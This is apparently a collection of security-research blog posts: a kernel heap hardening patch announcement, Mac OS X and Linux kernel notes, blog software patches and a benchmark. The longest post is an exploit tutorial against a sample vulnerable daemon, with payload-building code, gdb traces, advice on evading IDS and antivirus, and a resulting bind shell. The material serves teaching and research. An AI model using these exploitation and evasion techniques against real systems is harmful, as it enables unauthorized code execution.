Apparently there's been an increased interest in bringing Linux kernel security issues to attention over the past few months. It is a natural reaction to a policy that has long been tacitly agreed upon by nearly everyone involved in Linux kernel development (and more so by those with security-relevant roles, particularly a specific vendor). That is, a policy of silence. It is no surprise that Linux security currently looks much better on paper and in marketing propaganda than it does in reality.
It takes a decent amount of will and dedication to summarize, categorize and review every potential security vulnerability for such a huge project. It also requires collaboration between different vendors, who might or might not have agendas of their own that conflict with the interests of users or of the other vendors. It takes approximately ten minutes for an average computer user to write a summary of why SELinux can help your organization cut down security risks.
What you don't know is that you will have to go through the learning curve of writing policies, reviewing all software being used (including commercial applications which might not conflict with any 'learning' mode at kernel level, but consistently prevent targeted reverse engineering or make it even more tiresome), testing the setup and adapting its architecture to the real needs of your organization. MLS is rarely used outside certain circles.
Without further ado, KERNHEAP is available at http://www.subreption.com/kernheap as patches applicable to the latest stable 2.6 Linux kernel revision.
What's new?
The page sanitization functionality has been removed in favor of using KERNHEAP alongside PaX, which provides an (unconditional) memory sanitization feature. In the near future, a SLAB flag might be added to support allocation-level sanitization.
The vmalloc vmap structures are now stored in an isolated cache, instead of a generic kmalloc cache. This helps to avoid certain cases in which a SLAB buffer overflow scenario could corrupt a neighboring vmap area structure, leading to potentially exploitable conditions during list walking in the vmap routines, where checks have been implemented to validate pointer correctness.
Full protection against double frees and other types of heap corruption has been implemented for SLAB, SLUB and SLOB (the latter currently with limited functionality; users of SLOB would be better off moving to SLAB). Cache and slab meta-data is protected as well.
Currently only x86 and UML have been tested (you can protect User-Mode Linux kernels with KERNHEAP seamlessly).
Poisoning and the "pit" area
This change affects architectures with a fixmap. Currently x86 and User-Mode Linux (UML) have been tested (the latter lacks a fixmap implementation). Poisoning alone is architecture-independent.
Every cache contains two unsigned long values, for poisoning uninitialized and free objects. If the architecture supports a fixmap, these values are randomized within a range, pointing to a reserved top memory location (a "mapping" within the fixmap). The page fault handler is modified to include a special case to handle accesses to this region. This allows us to reliably detect use of uninitialized or already released objects, as well as poisoning other pointer values (such as list nodes after unlinking).
This region is referred to (in KERNHEAP source code and documentation) as "the pit".
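To make the idea more concrete, here is a minimal user-space model in Python of per-cache poison values chosen inside a reserved range, together with the check a modified page fault handler could apply. It is only a sketch: the range constants, the pointer size and every name in it (`PIT_START`, `PIT_SIZE`, `random_poison`, `is_pit_access`, `Cache`) are hypothetical and are not taken from the KERNHEAP patches.

```python
import random

# Hypothetical values: the real range depends on the fixmap layout.
PIT_START = 0xFFFFB000
PIT_SIZE = 0x1000          # assume a single reserved page
POINTER_SIZE = 4           # 32-bit x86


def random_poison(rng):
    """Pick a pointer-aligned poison value that falls inside the pit."""
    slots = PIT_SIZE // POINTER_SIZE
    return PIT_START + rng.randrange(slots) * POINTER_SIZE


def is_pit_access(fault_address):
    """The special case a page fault handler could test for."""
    return PIT_START <= fault_address < PIT_START + PIT_SIZE


class Cache:
    """Each cache carries two poison values, as described above."""

    def __init__(self, name, rng):
        self.name = name
        self.poison_uninit = random_poison(rng)  # uninitialized objects
        self.poison_free = random_poison(rng)    # released objects


rng = random.Random()
cache = Cache("example-cache", rng)
print(hex(cache.poison_uninit), is_pit_access(cache.poison_uninit))
```

Because both poison values point into a region that is never legitimately accessed, any dereference of a poisoned pointer faults at an address the handler can recognize.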
Architectures without fixmap support are unsupported, and will require editing the patch to avoid using fixmap-based poison address values. This would be done in the same way UML support is written; it is a simple change.
SAFELIST
KERNHEAP now provides more than mere safe unlinking. List nodes have their pointers poisoned after unlinking and the correctness of the nodes is verified during certain core operations. This provides robust protection against most forms of corruption in all linked lists. In the near future, protection for other similar interfaces might be implemented.
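The combination of safe unlinking and pointer poisoning can be illustrated with a small Python model of a circular doubly linked list. This is a sketch of the general technique, not the SAFELIST code itself: `LIST_POISON`, `ListCorruption`, `Node`, `list_add` and `list_del` are names made up for the example, and a sentinel object stands in for a poison address.

```python
LIST_POISON = object()  # stand-in for a poison address


class ListCorruption(Exception):
    """Raised when a node fails a consistency check."""


class Node:
    def __init__(self, value=None):
        self.value = value
        self.prev = self   # an empty list head points at itself
        self.next = self


def list_add(new, head):
    """Insert new right after head, verifying head's links first."""
    nxt = head.next
    if nxt.prev is not head:
        raise ListCorruption("head.next.prev does not point back to head")
    new.prev, new.next = head, nxt
    nxt.prev = new
    head.next = new


def list_del(node):
    """Unlink node only if its neighbours agree, then poison it."""
    if node.prev is LIST_POISON or node.next is LIST_POISON:
        raise ListCorruption("node was already unlinked")
    if node.prev.next is not node or node.next.prev is not node:
        raise ListCorruption("neighbours do not point back to node")
    node.prev.next = node.next
    node.next.prev = node.prev
    node.prev = node.next = LIST_POISON


head = Node()
entry = Node("payload")
list_add(entry, head)
list_del(entry)
try:
    list_del(entry)          # second unlink of the same node
except ListCorruption as exc:
    print("caught:", exc)
```

The second `list_del` is rejected because the node's pointers were poisoned by the first one, which is the behavior that turns a double unlink into a detectable error instead of a write through stale pointers.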
KERNHEAP and PaX or grsecurity
We recommend using PaX and KERNHEAP together, since PaX features can benefit from the meta-data corruption protections (among other things, for example for USERCOPY) and KERNHEAP itself can benefit from KERNEXEC and other protections to deter kernel exploitation. The patches shouldn't conflict with each other, but any potential conflict can be easily resolved, either manually or through a "pax-compat" patch available on the distribution site.
Support and sponsoring
At the moment, KERNHEAP is developed by Subreption LLC. We do not offer support to organizations and individuals, apart from bug fixes, maintaining up-to-date patches and developing new features as we see fit. If you are interested in custom solutions or support for your organization related to KERNHEAP, or you are interested in sponsoring its development, contact us.
An article written by Dan Goodin from The Register was recently published. It
mentions a forthcoming presentation by Vincenzo Iozzo, which presents a method
to load a binary at runtime, directly from memory, on Mac OS X systems.
Here we like to stick to the technical side of things... so let's get started
on explaining how this can be done, in case you aren't planning to attend Black Hat or
just feel particularly curious about the topic!
The Mach-O Dynamic Loader: dyld and runtime binary loading
When you execute a program, the operating system processes its main binary
("the executable") and resolves its dependencies before execution begins. Modern
operating systems allow programs to depend on other software dynamically. Instead
of compiling all the features statically (that is, building them into the main
executable), a program can declare such dependencies and have them resolved at
load time. When the executable is loaded, a piece of software (the dynamic linker)
takes care of finding such dependencies, placing them in memory, and updating the
locations where our program will find the necessary functions, et cetera. This
saves space and produces less bulky binaries, and it eases updates, since a
library can be upgraded while retaining backwards compatibility.
The good fellows at Apple designed an even more efficient procedure for loading
common libraries: some of them stay in memory after the system boots, providing
faster loading times and better execution speed, while lowering the stress on the disk
caused by repeatedly loading libraries when executing a new process. The place
where such common libraries are loaded is the shared region. It's been used to
produce 100% reliable local privilege escalation exploits, too.
In Mac OS X, the dynamic linker is known as dyld. Leopard implements
a rudimentary form of ASLR, consistent enough to deter the simplest threats but
ineffective against some other issues (heap overflows, memory leaks and so forth).
dyld happens to be loaded at a static address in every Leopard installation,
regardless of language, distribution (that includes Server) or platform.
Given a couple thousand different Intel-based 32-bit Leopard installations, dyld
will live at 0x8fe00000 on all of them.
We've been waiting for a rather long time to hear back from the current
maintainer of Pyblosxom, the Python blogging software running this blog.
He's probably busy or taking some time off, so we are releasing some
patches for a few minor security issues. The main one is a mere cross-site
scripting bug, likely the most annoying, common and rather stupid kind of
security issue in web applications. In any case, you most likely want this fixed!
Applying these patches also fixes a potential directory traversal issue.
If you are using Pyblosxom to power your blog, please feel free to review these
patches and apply them to your code base if required.
This blog uses a slightly modified version of the original source code, with
certain improvements for performance and aesthetics. In the future we might
contribute our modifications to the upstream development tree.
Several software vendors realized, sometime during the 1990-2000 timeframe,
that exporting system call tables within kernel address space was a bad idea.
This obviously doesn't mean anything to Red Hat and other GNU/Linux vendors
who are happily providing world readable System.map files. Not
like anybody needs them, though.
Then again, you have to face potential funniness of contradictory measures,
like Apple's own mistakes. This article won't talk about yet another bug
introduced by a Linux developer working at Red Hat (and later silently fixed
by another employee of the very same company), but an interesting issue with
Mac OS X 10.4 systems on PowerPC.
The temp_patch_ptrace() function: how to fix an issue and introduce a new one
Although the implementation of ptrace on Mac OS X is severely crippled,
Apple had time to add a nifty trick to prevent immediate debugging of certain
processes. Undocumented, it was obviously used only by Apple's own software, namely
iTunes and related applications. A private flag set by a process would disallow
future interaction with it via ptrace or other mechanisms, thus
causing the gdb debugger to fail when trying to attach to the target
process. It is a modern version of the good old trick first described publicly
by Silvio Cesare in one of his anti-debugging articles.
Apple, possibly with the intention of helping anti-piracy software vendors (in
their quest to preserve all that is good and just in the software industry and
beyond), added a KPI (Kernel Programming Interface) that lets a kernel extension
patch the ptrace system call. The sysent variable (the
BSD equivalent of the Linux syscall_table, holding pointers, arguments
and other data of the supported system calls) is not exported
in any Mac OS X system, as a measure to prevent abuse (for example, in rootkits
and other malware subverting kernel-land code).
Therefore, there's no absolutely reliable method to patch the system call table
without resorting to hacks (even though these can be extremely reliable, they are
almost always tied to specific versions and/or architectures). Hence, the existence
of temp_patch_ptrace. See the implementation of the function below:
Once again, the Linux kernel developers delight us with their always discreet (read: silent, no-advisory, no-warning policy) and wonderful patching practices. Sometime between 2.6.24 and 2.6.25 a patch from a Red Hat developer was committed into the Linux kernel git tree, implementing changes to the VMI interfaces hooking some functions dealing with the GDT and LDT.
diff --git a/arch/x86/kernel/vmi_32.c b/arch/x86/kernel/vmi_32.c
index 6ca515d..edfb09f 100644
--- a/arch/x86/kernel/vmi_32.c
+++ b/arch/x86/kernel/vmi_32.c
@@ -235,7 +235,7 @@ static void vmi_write_ldt_entry(struct desc_struct *dt, int entry,
                                const void *desc)
 {
        u32 *ldt_entry = (u32 *)desc;
-       vmi_ops.write_idt_entry(dt, entry, ldt_entry[0], ldt_entry[1]);
+       vmi_ops.write_ldt_entry(dt, entry, ldt_entry[0], ldt_entry[1]);
 }
 
 static void vmi_load_sp0(struct tss_struct *tss,
It's not entirely clear whether there's a reliable way to abuse this issue (since
data passed to sys_modify_ldt goes through several checks and might not
trigger the vulnerable code path right away). That said, the original commit mentions
that it was discovered when the JRE caused failures. In addition, vmi_ops.write_idt_entry
might do further validation, thus reducing the issue to a mere denial of service in
the worst case. Also, it affects only x86 VMI guests.
After some time without any updates, this article shows some techniques and strategies to improve the reliability of exploit code on Mac OS X Tiger and Leopard (up to 10.5.5). Specifically, we will look at a technique to aid the loading of stager shellcode and to evade non-executable stack restrictions. This was hinted at in chapter 7 of the "OS X Exploits and Defense" book (Elsevier), which I wrote earlier this year (I co-authored the book with Kevin Finisterre).
Ideally, when shellcode size restrictions exist, and possibly in almost any situation where subtle and discreet operation is required, you should never use a standard or publicly available shellcode, like the usual so-called "bind shell" or "reverse shell". Not only are they identified by IDS vendors, but they will also fail when certain constraints are present. In addition, a combination of stubs (splitting functionality into small dock-able shellcodes) with an encoder will defeat most packet inspectors and signature-based detection products (for example, antivirus engines).
Caveats
When using a stager, you might find a few different shortcomings that prevent your code from being reliable or effective against the widest range of architectures and platforms:
- Requiring an allocation procedure. Usually unavoidable in kernel-land
exploit code, but workarounds exist in special circumstances. Using
malloc() or other allocators requires previous knowledge of their location
within the address space.
- Stage size and memory resilience: do you want your shellcode to be
eventually swapped to disk and remain there for any future forensics?
Certainly not. Using mlock is required.
- Endianness and direction of stack growth (on most architectures the stack
grows down, but on some it doesn't, so subverting the previous frame might
not be effective). If your data is transmitted from a remote stage-serving
host, you want it to be translated to the endianness of the target stager
listener.
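The endianness caveat comes down to agreeing on a byte order for every multi-byte value that crosses the wire. As a minimal Python sketch, a 32-bit length header can be packed explicitly for the byte order of the receiving side. The helper names `encode_length` and `decode_length` are hypothetical and only serve the illustration.

```python
import struct


def encode_length(length, target_byteorder):
    """Pack a 32-bit length in the byte order the receiver expects."""
    fmt = "<L" if target_byteorder == "little" else ">L"
    return struct.pack(fmt, length)


def decode_length(raw, byteorder):
    """Unpack a 32-bit length that was sent in the given byte order."""
    fmt = "<L" if byteorder == "little" else ">L"
    return struct.unpack(fmt, raw)[0]


# Intel Macs are little-endian, PowerPC Macs are big-endian.
print(encode_length(0x1234, "little").hex())
print(encode_length(0x1234, "big").hex())
```

Stating the byte order in the format string, instead of relying on the native order of the sending host, keeps the same sender usable against both Intel and PowerPC targets.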
The sample vulnerable daemon
vulnerabled is a (TCP based) network daemon which processes
incoming messages and seeks a callto:// handler. Then it reads
whatever is trailing after the handler string. Imagine this daemon is used
to connect to a VoIP solution that calls numbers provided by a crawler to
do phone spam or targeted advertisement.
The daemon properly reads the incoming message into a heap allocated buffer,
named tmpbuf. Its contents are zeroed every time the loop runs, therefore
making reliable usage of the buffer impossible on two consecutive runs if
tmpbuf points to the same address. A memory leak would help in
this situation, but there's none.
Afterwards, data is read from the incoming connection into tmpbuf.
The daemon NULL-terminates the buffer, but if the address held in tmpbuf has been
overwritten, a NULL byte will be written out of bounds. Such a situation could be
useful in certain cases, but we won't be looking into this particular possibility
in depth in this article. A single NULL byte write can indeed lead to arbitrary
code execution, as long as some requirements are met: here the offset will be equal
to the length of the data received from the client, thus we will need to send a
payload of a specific length to match the offset (example: target address minus
address of tmpbuf) where we want our NULL to be injected.
char *tmpbuf = NULL;
char vulnbuf[265];
...
tmpbuf = malloc(8092);
...
while(1) {
    ...
    memset(vulnbuf, 0, sizeof(vulnbuf));
    ...
    if ((recvlen = recv(connfd, tmpbuf, 8092, 0)) != -1)
    {
        tmpbuf[recvlen] = '\0';
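The "target address minus address of tmpbuf" arithmetic mentioned above is simple enough to write down. The Python sketch below only computes the length a message would need for the terminator to land on a given address. The function name and the example addresses are hypothetical, and the 8092 limit is the size passed to recv in the excerpt.

```python
def length_for_terminator(target_address, tmpbuf_address, max_recv=8092):
    """Return the message length that places the terminator at target_address.

    The daemon writes tmpbuf[recvlen] = 0, so the byte lands at
    tmpbuf_address + recvlen and recvlen must equal the difference.
    """
    offset = target_address - tmpbuf_address
    if not 0 < offset <= max_recv:
        raise ValueError("target is not reachable with a single recv()")
    return offset


# Hypothetical addresses, for illustration only.
print(length_for_terminator(0x800100, 0x800000))
```

Note that the difference has to fit within what a single recv call can return, which is why the helper rejects targets below the buffer or more than 8092 bytes past its start.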
If the incoming data contains the handler string, the daemon copies the trailing
string into the stack-based buffer named vulnbuf, which has a fixed size
of 265 bytes. This is a stack-based buffer overflow condition with a twist: we can
abuse variable ordering to mount a more sophisticated attack against vulnerabled.
Instead of a single packet payload, we will dedicate one packet to sending the main
payload and a second one to triggering it and subverting the execution flow in an
elegant manner. This will allow us to introduce the main topic of this article: creating
custom shellcode for evading security measures and improving the reliability of stagers.
if ((recvlen > handlerlen) &&
    (!memcmp(tmpbuf, DEFAULT_HANDLER, handlerlen)))
{
    ...
    memcpy(vulnbuf, tmpbuf+handlerlen, recvlen-handlerlen);
    fprintf(stdout, "received message: %s\n", vulnbuf);
}

if (recvlen > 4 && (tmpbuf[0] == '.') &&
    (tmpbuf[1] == 'e') && (tmpbuf[2] == 'n') &&
    (tmpbuf[3] == 'd'))
    break;
The exploit approach
In the previous section we walked through the code of the sample vulnerable
daemon, reviewing the potentially exploitable security issues. Finally, we
suggested an elegant approach to abuse the issues for reliable code execution
against Apple Mac OS X Leopard 10.5.5. This section will explain said approach
thoroughly.
The layout of the attack is as follows:
- Initial payload:
  - Handler string (callto://)
  - Small NOP sled
  - Custom mprotect() and pre-stager shellcode
  - Stager shellcode
  - Instructions to return or exit gracefully
  - Random alphanumeric padding
  - Address to EBP
- Second "trigger" payload:
  - Handler string (callto://)
  - End control message (.end)
  - Address to write at EBP+4 (saved EIP)
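# Initial payload: shellcode, then padding up to the 265 bytes of vulnbuf
data += self.shellcode
data += self.random_string(265-len(self.shellcode))
# Two 4-byte fillers, then the value that replaces the tmpbuf pointer
data += self.random_string(4)
data += self.random_string(4)
data += struct.pack('<L', ebp_address)

# Second "trigger" payload: end control message plus the new saved EIP
heap_jumper = ''
heap_jumper += '.end'
heap_jumper += struct.pack('<L', 0x80000c)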
You might have noticed that writing at EBP in order to overwrite saved EIP
requires us to write 4 bytes preceding the new EIP value. The length
of the end control message is... exactly 4 bytes. And that's the condition
that lets us abuse the variable ordering to point tmpbuf at
EBP directly and overwrite saved EIP correctly. The final payload is
copied by recv to the address held in EBP:
(gdb) p $ebp
$32 = (void *) 0xbffff888
(gdb) p tmpbuf
$33 = 0xbffff888 ".end\f"
(gdb) x/2x tmpbuf
0xbffff888: 0x646e652e 0x0080000c
(gdb) x/i 0x0080000c
0x80000c: nop
(gdb) p recvlen
$34 = 8
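The two words shown by gdb can be cross-checked offline. This short Python sketch rebuilds the 8 bytes of the trigger message (the `.end` control string followed by the little-endian address 0x80000c) and reads them back as two 32-bit little-endian words, the same view `x/2x` gives on x86.

```python
import struct

# The ".end" control message followed by the 32-bit little-endian address.
trigger = b".end" + struct.pack("<L", 0x80000C)

# Read the same 8 bytes back as two little-endian words, like x/2x does.
words = struct.unpack("<2L", trigger)

print(len(trigger))             # 8
print([hex(w) for w in words])  # ['0x646e652e', '0x80000c']
```

The first word is simply `.end` read backwards as bytes (0x2e, 0x65, 0x6e, 0x64), and the low byte of the address, 0x0c, is the form feed that gdb prints as `\f` at the end of the string.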
Note the address pointing to the heap buffer which was allocated initially.
Mac OS X has an absolutely predictable heap, fortunately for us and unfortunately
for end-user security. We have effectively overwritten a pointer
to force the next recv call to write arbitrary data at EBP.
(gdb) c
Continuing.
vulnerabled(1654) malloc: *** error for object 0xbffff888: Non-aligned pointer being freed
*** set a breakpoint in malloc_error_break to debug

Program received signal SIGTRAP, Trace/breakpoint trap.
0x0080002b in ?? ()
(gdb) x/4i $eip
0x80002b: xor %eax,%eax
0x80002d: push %eax
0x80002e: push %eax
0x80002f: push $0x1012
(gdb) i f
Stack level 0, frame at 0xbffff888:
 eip = 0x80002b; saved eip 0xbf800000
 called by frame at 0x800032
 Arglist at 0xbffff880, args:
 Locals at 0xbffff880, Previous frame's sp is 0xbffff888
 Saved registers:
  ebp at 0xbffff880, eip at 0xbffff884
There's a catch: if the binary has been compiled with IBM Stack Smashing Protector (SSP, formerly known as ProPolice), the arrangement of variables in memory will be different and we won't be able to reach the pointer from the stack-based buffer, thus rendering this approach impossible.
Custom shellcode, stagers and non-executable stack
The custom shellcode explained here will use only a single
function from libSystem (the libc of sorts on OS X): mprotect.
It should be feasible to change memory protections using a different
method, but this is suitable for a re-spawning daemon since we can
bruteforce the dyld stub address.
It uses the mmap and mlock system calls, to
map memory at PAGE_ZERO (NULL, 0x00000000) and
lock pages to physical memory, respectively.
This is the first time that this technique appears (specifically for OS X)
publicly. The Mach-O binary format defines a zeroed, unmapped memory segment
at position 0, named PAGE_ZERO. It remains unmapped under normal circumstances
to force exceptions on NULL dereference conditions (read/write to NULL, offset
from NULL when reading a member of a structure pointing at NULL, etc).
If we map PAGE_ZERO and set its permissions to read-write-execute, we will have
space of PAGE_SIZE length (4096 bytes on x86) for storing shellcode stages
and pretty much anything we could find useful. Side-effects of mapping PAGE_ZERO
will be difficult to predict. Any future mistakes and programming errors
that dereference NULL or an offset from NULL won't raise an exception. Also,
if data is written there, our shellcode or data will be corrupted. Therefore,
for safety purposes, we might want to leave an initial set of bytes at NULL
unused (unchanged, thus zeroed). If data changes in the initial bytes, we
could raise an exception to emulate normal behavior, in case it's
been done as part of a test to detect our presence.
Mapping PAGE_ZERO will be clearly visible and it's not subtle if it remains in
mapped state for a long time. Apparently the dyld loader and other operations
during Mach-O execution time map the segment for a very short time.
The mprotect call produces the following results when executed within
the context of vulnerabled after successful exploitation, before execution
of the stager shellcode:
Stack bf800000-bffff000 [ 8188K] rwx/rwx SM=PRV
Stack bffff000-c0000000 [ 4K] rwx/rwx SM=COW thread 0
Stack [ 8192K]
And the mmap of PAGE_ZERO produces the following results (note the
initial unmapped state, and the different permissions afterwards, before the
final mprotect call):
Before mmap():
__PAGEZERO 00000000-00001000 [ 4K] ---/--- SM=NUL .../vulnerabled
__PAGEZERO [ 4K]

Before mprotect():
__PAGEZERO 00000000-00001000 [ 4K] rw-/rwx SM=NUL .../vulnerabled

After mprotect():
__PAGEZERO 00000000-00001000 [ 4K] rwx/rwx SM=NUL .../vulnerabled
Now our stager shellcode will be able to write data received from the attacking host to a writable and executable region at a static address, without requiring allocation using non-static locations.
Conclusions
Developing custom shellcode is trivial in most situations, although testing can
be tiresome. Mac OS X's lack of heap and mmap randomization is embarrassing,
and its layout has been repeatedly demonstrated to be easily predictable. Also, heap
memory permissions aren't enforced against execution (and read implies execute on Intel),
thus making the heap a safe bet for storing our shellcode and other data at runtime during
exploitation. ASLR in Leopard is incredibly weak, allowing trivial abuse of daemons
and applications that re-spawn after an exception, and certain parts of the dyld ABI
are still static. Last but not least, the lack of general memory permissions enforcement
allows regions to be made executable, thus defeating the whole purpose of both ASLR
and NX on OS X.
$ python vulnerabled_exploit.py -s 127.0.0.1 -p 6888
[+] Target vulnerabled at 127.0.0.1:6888 ...
[+] Running...
[+] Finished (shellcode was 152 bytes, 290 total).
[+] Check 127.0.0.1:6900 for shell.

(gdb) r
Starting program: ./vulnerabled
Reading symbols for shared libraries ++. done
Starting ./vulnerabled (pid: 2141, port: 6888)...
connection from 127.0.0.1
tmpbuf=0x800000 vulnbuf=0xbffff74b esp=0xbffff6f0
it's a good message! (282 bytes, 273 in data)
received message: ??????????1??R???
connection from 127.0.0.1
tmpbuf=0xbffff888 vulnbuf=0xbffff74b esp=0xbffff6f0
vulnerabled(2141) malloc: *** error for object 0xbffff888: Non-aligned pointer being freed
*** set a breakpoint in malloc_error_break to debug

Program received signal SIGTRAP, Trace/breakpoint trap.
0x8fe01010 in __dyld__dyld_start ()
(gdb) c
Continuing.
Reading symbols for shared libraries .. done

$ nc 127.0.0.1 6900
id
uid=501(myuser) gid=20(staff) groups=20(staff),98(_lpadmin), ...
The .NET framework provides a Marshal class in its System.Runtime.InteropServices namespace, which helps interface native, unmanaged data with managed code. The easy path in most of these cases is to simply use unsafe blocks and cast a pointer, but you end up losing references to allocated structures, leaking memory and likely leaving some funny exploitable condition in your unmanaged code bridge. Those pesky dangling pointers...
The function below calls an internal method to retrieve the list of loaded
kernel modules from userland. It depends on NtQuerySystemInformation()
and requires a heap-allocated structure array. Interfacing this with a C# managed
class will require another exported function to call HeapFree() and
release the allocated memory.
Using such an approach is certainly not recommended but it will cut you some hassle:
extern "C" __declspec(dllexport) PSYSTEM_MODULE_INFORMATION GetKernelModules(void)
{
    HANDLE tmpHeap = GetProcessHeap();
    PSYSTEM_MODULE_INFORMATION modList = NULL;

    LoadFunctionPointers();
    _getSysModules(&modList, tmpHeap);

    return modList;
}

extern "C" __declspec(dllexport) void MyFreeHeap(LPVOID ptrToFree)
{
    HeapFree(GetProcessHeap(), HEAP_NO_SERIALIZE, ptrToFree);
}
Running our custom pyblosxom engine with mod_wsgi and the Apache disk-based cache enabled currently yields roughly 170 requests per second. This was measured on 6th September 2008 with 50 concurrent requests and a total of 1000 requests against the index page.
There is room for improvement: lighttpd or a similar high-performance web server could probably beat these numbers, perhaps by a few thousand requests per second. We will likely test such a setup in the future. In our tests, lighttpd itself can handle around 1012.06 requests per second for a lightweight PHP script served over FastCGI with no database backend.
Server Software: Apache
Server Hostname: blog.subreption.com
Server Port: 80
Document Path: /hub
Document Length: 24112 bytes
Concurrency Level: 50
Time taken for tests: 5.882 seconds
Complete requests: 1000
Failed requests: 0
Write errors: 0
Total transferred: 24289000 bytes
HTML transferred: 24112000 bytes
Requests per second: 170.02 [#/sec] (mean)
Time per request: 294.088 [ms] (mean)
Time per request: 5.882 [ms] (mean, across all concurrent requests)
Transfer rate: 4032.75 [Kbytes/sec] received
Connection Times (ms)
min mean[+/-sd] median max
Connect: 0 0 0.2 0 1
Processing: 17 287 51.1 299 490
Waiting: 16 286 51.2 298 490
Total: 18 287 51.0 299 491
Percentage of the requests served within a certain time (ms)
50% 299
66% 313
75% 321
80% 325
90% 338
95% 351
98% 368
99% 375
100% 491 (longest request)
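As a sanity check, the derived figures in the report above can be recomputed from its raw counters. This Python sketch uses only numbers printed in the report; small differences in the last digits are expected because the elapsed time is shown rounded to milliseconds.

```python
complete_requests = 1000
concurrency = 50
time_taken_s = 5.882
document_length = 24112        # bytes
total_transferred = 24289000   # bytes, headers included

# Throughput: completed requests divided by wall-clock time.
requests_per_second = complete_requests / time_taken_s

# Mean time per request as seen by each of the 50 concurrent clients.
time_per_request_ms = concurrency * time_taken_s / complete_requests * 1000

# Mean time per request across all concurrent requests.
time_per_request_all_ms = time_taken_s / complete_requests * 1000

# Transfer rate in Kbytes per second.
transfer_rate_kb_s = total_transferred / 1024 / time_taken_s

# HTML transferred is the document length times the number of requests.
html_transferred = complete_requests * document_length

print(round(requests_per_second, 2), round(time_per_request_ms, 1))
print(round(time_per_request_all_ms, 3), round(transfer_rate_kb_s, 1))
print(html_transferred)
```

The two "Time per request" lines differ exactly by the concurrency level, which is a quick way to tell them apart when reading such reports.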